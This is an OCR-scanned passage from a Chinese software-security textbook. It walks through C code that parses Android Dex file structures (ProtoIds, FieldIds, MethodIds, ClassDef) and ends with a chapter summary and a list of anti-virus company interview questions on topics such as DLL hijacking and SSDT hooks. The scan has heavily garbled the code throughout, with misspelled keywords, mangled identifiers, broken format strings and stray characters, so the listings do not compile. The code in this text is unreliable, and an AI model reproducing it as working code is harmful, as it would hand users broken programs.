值 类 型 、 参 数 个 数 ， 以 及 参数 的 类 型 。 对 于 Protolds 的 解析 ， 首 
先是 对 原始 数据 的 解析 ， 然 后 再 将 它 简单 地 还 原 为 可 以 直接 阅读 “图 1033 Typelds 解析 后 的 输出 
的 方法 原型 。 

先 来 看 一 下 代码 ， 代 码 如 下 ; 

os printPprotoIlds (DexFile. *pDexFile) 

















Brantf( DexXprotolds Ney) 


// 对 数据 的 解析 
Tor ("mdi0 vpDexFile->pHeader >protoldsSize; 工本 全 用 
{ 
const DexProtold *pDexProtoId = dexGetProtold (pDexFile, 41)» 
// 输出 原始 数据 
printf("%O08X S08X 和 08X \r\n", pDexProtioIld->shortyIidx, PDexProtold->returnTy 
peldx, PDexProtold->parametersQOff)’; 
// 输出 对 应 的 TypeIqd 
Drintt( "ee BoveNn, 
dexSstringByld(pDexFile, pDexProtolId->shortyIdx), 
dexstringByTypelIdx (pDexFile, pDexProtold->returnTypeldx)); 


// 获得 参数 列表 
const DexTypeList *pDexTypeList = dexGetProtoParameters (pDexFile, pDexProtold); 


u4 num = pDexTypeList != NULL 2? pDexTypeList->size : 0; 
// 输出 参数 

Eo ha 0) oR a 

{ 





printf("%s ", dexStringByTypeldx (pDex?ile, pDexTypeList->list[j] .typeldx)); 
} 
Brat NEN Ts 
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PrintE(m NN 


// 对 解析 数据 的 简单 还 原 

for ( u4 = 0; i < pDexFile->pHeader->protoldsSize; i ++ ) 

{ 
const DexProtoId *pDexProtoIld = dexGetProtoId(pDexFile, 1)， 
printf ("Ss", dexStringByTypeldx (pDexFile, pDexProtold->returnTypeldx))’; 
EELnt (0) 


// 获得 参数 列表 
const DexTypeList *pDexTypelist = dexGetProtoParameters(pDexFile, pDexProtoId); 


U4 num = pDexTypeList != NULL ?2 pDexTypeList->size : 0; 
// 输出 参数 
ER 
{ 
printf(”ss\b, ", dexSstringByTypeIdx(pDexFile, pDexTypeList->list0j]: 


typeldx)); 
} 


if ( num == 0 ) 
{ 
DELAntE( mY ?NNN )’s 
} 
else 
{ 
printf ("\b\b);\r\n"); 
} 
} 
】 


在 该 自 定 义 函 数 中 有 两 个 for 循环 ， 其 内 容 基 本 一 致 。 第 一 个 循环 完成 了 数据 的 解析 ， 
第 二 个 循环 是 将 数据 简单 地 解析 成 了 方法 的 原型 。 

这 里 只 对 第 一 个 for 循环 进行 说 明 。Protolds 是 方法 的 原型 ， 看 一 下 DexProtold 的 定义 ， 
定义 如 下 : 

J/ 


* Direct-mapped "proto, id item". 


od 

struct DexProtold { 
u4 shortyldx; /* index into stringIds for shorty descriptor */ 
u4 returnTypeldx; /* index into typelds jist for return type */ 
U4 parametersOff; /* file offset to type_ list for parameter types */ 


ji 

前 面 已 经 详细 介绍 过 这 个 结构 体 了 ， 这 里 把 它 拿 出 来 是 一 个 简单 回顾 。 第 一 个 字段 是 方 
法 原型 的 短 描述 ， 第 二 个 字段 是 方法 原型 的 返回 值 ， 第 三 个 字段 是 指向 参数 列表 的 。 因 此 ， 
可 以 看 到 , 在 两 个 for 循环 中 , 仍然 艇 套 着 一 个 for 循环 , 外 层 的 循环 是 用 来 解析 方法 原型 的 ， 
内 层 的 循环 是 用 来 解析 方法 原型 中 的 参数 的 。 

首先 ， 通 过 dexGetProtold 函数 来 获得 Protolds， 然 后 通过 
dexGetProtoParameters 函数 来 得 到 相应 Protolds 的 参数 。 

在 main 函数 中 调用 笔者 的 自 定义 函数 , 输出 如 图 10-34 所 示 。 

从 图 10-34 中 可 以 看 出 ， 该 Dex 文件 中 有 3 个 方法 原型 ， 

这 里 来 说 一 下 Protolds 中 的 shortyIdx 这 个 简短 描述 的 意思 , 用 

第 二 个 方法 原型 来 说 明 。 

第 二 个 方法 原型 是 V(Ljava/lang/String); 这 种 形式 ， 它 的 简 4 
短 描述 是 VL。V 表示 返回 值 类 型 ， 就 是 V， 而 L 就 是 第 一 个 参数 的 类 型 。 再 举 个 例子 ， 如 











心 
0 
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果 简 短 描述 是 VII[， 那 么 返回 值 类 型 是 V, 然后 有 两 个 参数 ， 第 一 个 参数 是 I 类 型 ， 第 二 个 参 
数 也 是 I 类 型 。 

7. 解析 Fieldlds 相关 数据 

FieldIds 的 解析 相对 于 Protolds 的 解析 就 简单 了 ， 直 接 上 代码 : 


void PrintFieldIids (DexFile *pDexFile) 


{ 
printf("DexFieldIids:\r\n"); 


for ( u4 主 = 0; i < pDexFile->pHeader->fieldIidsSize; i ++ ) 


{ 
const DexFieldld *pDexFieldId = dexGetFieldIid(pDexFile, i); 


printf ("%04X %04X %08X \r\n", pDexFieldId->classlidx, pDexFieldId->typeldx, 
pDexFieldId->nameIldx); 
printf ("Ss %s Ss\r\n", 
dexStringByTypeldx (pDexFile, pDexFieldId->classIdx), 
dexStringByTypeldx (pDexFile, pDexFieldIid->typeldx); 
dexStringById (pDexFile, pDexrieldId->nameIldx)); 
} 


} 

Field 是 类 中 的 属性 ， 在 DexFieldId 中 对 于 类 属性 有 3 个 字段 ， 分别 是 属性 所 属 的 类 、 属 
性 的 类 型 和 属性 的 名 称 。 

在 main 函数 中 调用 笔者 的 自 定义 函数 ， 输 出 如 
图 10-35 所 示 。 

8. 解析 Methodlds 相关 数据 

MethodIds 的 解析 也 分 为 两 部 分 ， 第 一 部 分 是 解析 数据 ， 第 二 部 分 是 简单 的 还 原 方法 。 
在 DexMethodId 中 给 出 了 方法 所 属 的 类 、 方 法 对 应 的 原型 ， 以 及 方法 的 名 称 。 在 解析 Protolds 
的 时 候 ， 只 是 方法 的 原型 ， 并 没有 给 出 方法 的 所 属 的 类 ， 还 有 方法 的 名 称 。 在 还 原 方法 时 ， 
就 要 借助 Protolds 才能 完整 地 还 原 方法 。 

解析 MethodIds 的 代码 如 下 : 


void PrintMethodIids (DexFile *pDexFile) 
{ 





图 10-35 ”FieldIds 解析 后 的 输出 


printf ("DexMethodIds: \r\n"); 


// 对 数据 的 解析 
for ( u4 i = 0; i < pDexFile->pHeader->methodIidsSize; i ++ ) 
{ 
const DexMethodId *pDexMethodId = dexGetMethodId(pDexFile, i); 
printf("%04X S04X ®%08X \r\n", pDexMethodId->classIdx, pDexMethodId->protoldx, 
PDPDexMethoaTa->nameIGX) : 
printf ("Ss Se ANENR 7 
dexStringByTypeldx (pDexFile, pDexMethodIid->classIdx), 
QexStringByIQ (pDexFile, pDexMethodId->nameIdx)); 
由 


BeartE( NN 
// 根据 protoIds 来 简单 还 原 方法 


for ( u4 i= 0; i < pDexFile->pHeader->methodIdsSize; i ++ ) 
{ 
const DexMethodId *pDexMethodId = dexGetMethodId(pDexFile, i); 
const DexProtoId *pDexProtold = dexGetProtoId(pDexFile, pDexMethodId->protoIdx); 


printf("%s ", dexSstringByTypeldx (pDexFile, pDexProtold->returnTypeldx)); 
printf ("$s\b.", GexSstringByTypeldx (PDexrile, 了 DexMethoadrTa=>classIdz) ) 
printf ("%s"; dexStringByld (pDexFileée, pDexMethodId->nameldx)); 
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// 获得 参数 列表 
Const DexTypeList *pDexTypeList = dexGetProtoParameters (pDexFile, PDexProtoId) : 


u4 num = pDexTypeList != NULL ? pDexTypeList->size : 0; 
// 输出 参数 
EoQrP CO tN 0 TN 
{ 
printf("%s\b, "; dexSstringByTypeldx(pDexFile, pDexTypeList->list[j] .typeldx)); 
} 


if ( neam == 0 ) 
{ 
printf (vy) 
} 
else 
{ 
printf ("\bB\b) ;7"); 
} 


printf("\r\n™); 

; } 

在 解析 数据 时 ， 只 是 将 数据 对 应 的 字符 串 进行 了 输出 , 而 还 原 方 法 时 ， 则 是 借助 Protolds 
来 完整 地 还 原 了 方法 。 

同样 , 在 main 函数 中 调用 笔者 的 自 定义 函数 ， 
输出 如 图 10-36 所 示 。 

在 解析 Protolds 的 时 候 是 有 3 个 方法 原型 ， 
在 解析 方法 时 是 4 个 方法 ， 第 一 个 方法 与 第 四 个 
方法 的 方法 原型 是 相同 的 。 

用 第 二 个 方法 来 进行 一 个 简单 说 明 ，V 
LHelloWorld.main([Lijava/lang/String]);。V 表示 方 
法 的 返回 值 类 型 ，LHelloWorld 是 方法 所 在 的 类 
main 是 方法 的 名 称 ，Ljava/lang/String 是 该 方法 参数 的 类 型 。 

9. 解析 DexClassDef 相关 数据 

解析 DexClassDef 是 最 复杂 的 部 分 了 ， 因 为 它 会 先 解析 类 相关 的 内 容 ， 类 相关 的 内 容 包 
含 类 所 属 的 文件 、 类 中 的 属性 、 类 中 的 方法 、 方 法 中 的 字 节 码 等 内 容 。 虽 然 复 杂 ， 但 是 它 只 
是 前 面 每 个 部 分 和 其 余部 分 的 组 成 ， 因 此 只 是 代码 比较 多 ， 没 有 什么 特别 难 的 地 方 ， 有 具体 代 
码 如 下 : 


void PrintClassDef (DexFile *pDexFile) 
{ 





图 10-36 ”MethodIds 解析 后 的 输出 


for ( u4 t =0; i < pDexFile->pHeader->classDefsSize; i ++ ) 
{ 
const DexClassDef *pDexClassDef = dexGetClassDef (pDexFile, i); 
// 类 所 属 的 源 文件 
printf ("SourceFilée : %s\r\n", dexGetSourceFile (pDexFile, pDexClassDef)); 
/7 类 和 父 类 
// 因为 我 们 的 Dex 文件 没有 接 日 所 以 这 里 就 没 写 
// 有 具体 解析 的 时 候 需要 根据 实际 情况 而 定 
printfl("class %s\b externs $s\b { \r\n™, 
dexGetClassDescriptor (pDexFile, pDexClassDef), 
dexGetSuperClassDescriptor (pDexFile, pDexClassDef)); 


const ul *pul = dexGetClassData (pDexFile, pDexClassDef),; 





一 一 = 
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DexClassData *pDexClassData = dexReadAndVerifyClassData (&pul, NULL); 


第 // 类 中 的 属性 
10 for (ad z= 0; z < pDexClassData~>header.instanceFieldsSize; Zz ++ ) 
{ 
章 const DexFieldId *pDexField = dexGetFieldIid(pDexFile, pDexClassData-> 
instanceFields[z] .fieldIdx); 
安 printf ("%5s SS\r\n™"y 
卓 dexStringByTypeldx (pDexFile, PDexFieId->typeIdx)， 
软 dexStringBylId (pDexFile, pDexField->nameldx)); 
件 } 
全 // 类 中 的 方法 
初 fo6r ( U4 z = 0; Zz < pDexClassData->header.directMethodsSize; z ++ ) 
{ 
探 const DexMethodIG *pDexMethod = dexGetMethodId (pDexFile, pDexClassData-—> 
directMethods[z] .methodIdx); 
const DexProtoId *pDexProtoId = dexGetProtoId(pDexFile, pDexMethod-> 
on protoIdx); 


printf("\t%s ", dexSstringByTypeldx (BDexFile, pDexProtoId->returnTypeldx)); 
| printf ("%s\b.", dexSstringByTypeIldx (pDexFile, pDexMethod->classIdx)); 
printf ("$s", dexStringById (pDexFile, pDexMethod->nameIdx)); 


Bednte (> 


// 获得 参数 列表 
Const DexTypeList *pDexTypeList = aqaexGetProtoParameters (pDexFile, pDexProtold); 


u4 num = pDexTypeList != NULL ?3 pDexTypeList->size : 0} 

// 输出 参数 

FOE 0 kK rm 二 十) 

{ 
printf ("Ss\b ved, ", dexSstringByTypeldx(pDexFile, pDexTypebist-> 
Ill Tm I), 

| 


Tf Mn = 0 
{ 
Brintet 大 人 
} 
else 
{ 
vintt (NY 
} 


Det E(t NE N\A 


// 方法 中 具体 的 数据 

const DexCode *pDexCode = dexGetCode(pDexFile, (const DexMethod *) &pDex 
ClassData~>directMethods[z]); 

printf("\t\tregister:%d \r\n", pDexCode->registersSize); 
printf("\t\tinsnsSize:%d \r\n"; pDexCode->insSize); 

printf ("NXtNXtinsSize:sd \r\n", pDexCode->outsSize); 


// 方法 的 字 节 码 
Prinea( MtNE/ Bytecode we NEN Ni) 
站 下 在 NEVER 


for ( u2 X= 107 去 < pDexCode~>insnsSize; XX '++ ) 
{ 
Printf("%04X ", pDexCode->insns [x]); 
} 
print Ef (VEN ) 


to pa i RD 
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PTE NN 
} 
} 


在 代码 中 逐步 地 对 类 进行 了 解析 ， 从 类 所 属 的 源 文件 、 类 的 名 称 、 类 的 父 类 、 类 的 属性 ， 
到 类 的 方法 以 及 类 的 字 节 码 。 除 了 方法 中 的 数据 在 前 面 的 代码 中 没有 ， 其 余 的 代码 在 前 面 都 
有 过 介绍 了 。 对 于 类 方法 中 的 数据 只 要 按照 DexCode 进行 解析 即 可 ， 这 里 请 参考 前 面 给 出 的 
DexCode 结构 体 即 可 。 

最 后 ， 在 main 函数 中 调用 笔者 的 自 定义 函数 ， 输 出 如 图 10-37 所 示 。 
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图 10-37 DexClassDef 解析 后 的 输出 


10.3 总 结 


本 章 介绍 了 安 卓 系统 下 关于 Dex 文件 的 解析 ， 对 于 安 卓 系统 的 解析 主要 参考 安 卓 系统 的 
DexClass.h、DexClass.cpp、DexFile.h、DexFile.cpp 4 个 文件 即 可 。 如 果 需 要 了 解 Dex 文件 的 
反 编 译 ， 那么 就 需要 在 了 解 这 4 个 文件 的 基础 上 ， 再 去 研究 DexOpcodes.h、DexOpcodes.cpp、 
InstrUtils.h、ImstrUtils.cpp 和 DexDump.cpp 这 5 个 文件 。 

学 习 和 掌握 文件 格式 ， 是 研究 软件 安全 的 基础 ， 很 多 时 候 不 单单 是 研究 文件 的 格式 ， 更 
要 研究 如 何 加 载 文 件 ， 比 如 对 视频 播放 器 进行 挖 洞 ， 在 了 解 视频 、 音 频 文件 格式 的 基础 上 ， 
再 去 研究 具体 某 款 播放 器 是 如 何 加 载 视 频 、 音 频 的 ， 从 中 找 出 可 利用 点 后 ,构造 特殊 的 视频 、 
音频 文件 来 对 播放 器 进行 攻击 。 对 于 可 执行 文件 格式 的 研究 ， 更 多 的 是 为 了 可 执行 文件 的 加 
固 保护 、 恶 意 程 序 分 析 等 目的 。 
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在 本 书 的 附录 中 给 出 几 道 反 病 毒 公司 的 面试 题 ， 这 些 题 中 有 的 是 本 书 中 介绍 过 的 内 容 ， 
也 有 一 些 是 本 书 中 没有 介绍 过 的 内 容 。 无 论 书 中 是 否 介绍 过 ， 相 信 掌 握 基 础 知识 的 读者 都 有 
| 能 力 来 解决 这 些 题 目 。 出 于 学 习 的 目的 ， 读 者 可 以 先 自行 回答 ， 如 果 有 疑问 ， 可 以 在 互联 网 
上 查找 相关 的 知识 进行 学 习 。 
下 面 给 出 笔者 总 结 出 来 的 反 病毒 公司 的 面试 题 。 
1.， 基础 题 
题目 1: call 与 jmp 的 区 别 是 什么 ? 
题目 2: 堆 与 栈 的 区 别 是 什么 ? 
题目 3: static、local、global 变量 有 什么 区 别 ? 哪 个 用 堆 保 存 ? 哪个 用 栈 保存 ? 
题目 4: rav2offset 怎么 实现 ? 
题目 5: 简 述 pe 资源 节 。 
题目 6: 常见 反 调试 手段 有 哪些 ? 
题目 7: SEH 是 什么 ? 说 说 自己 的 理解 。 
题目 8: 远程 线程 如 何 实现 ? 
题目 9: 简 述 脱 壳 的 一 般 步 又 。 
题目 10: 怎么 用 条 件 断 点 ? 
题目 11: inc/add 的 区 别 是 什么 ? 
题目 12: add eip,1 是 否 正确 ? 
题目 13: 壳 流 程 是 怎么 走 的 ? 是 否 写 过 脱 壳 机 ? 
题目 14: 怎么 判断 pe 文件 的 合法 性 ? 
2， 实 战 题 
题目 1: 写 出 DLL 劫持 的 原理 ， 并 写 出 哪些 DLL 不 能 被 支持 。 
题目 2: 内 核 模式 下 ， 人 允许 用 什么 工具 进行 调试 ? 
题目 3: 写 出 实 模式 下 的 寻 址 方式 。 
题目 4: 概括 一 下 游戏 木马 与 下 载 器 的 特征 。 
题目 5: GDT 和 LDT 分 别 表示 什么 ? 
题目 6: 详细 描述 SSDT 与 HOOK SSDT 的 区 别 。 
题目 7: HOOK API 与 API HOOK 有 什么 关系 ? 
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题目 8: 特征 码 分 为 几 种 ? 特征 与 病毒 是 什么 关系 ? 

题目 9，HOOK OpenProcess 会 导致 什么 后 果 ? 冰 刃 下 SSDT 中 的 红色 部 分 表示 什么 ? 
题目 10: 主动 防御 包括 哪些 方式 ? 

题目 11: 病毒 一 般 都 有 哪些 行为 ? 

题目 12: 病毒 常用 的 API 有 哪些 ? 


天 如 副 水 崔 世 仿 峰 潮 汗 ” 浏 宇 
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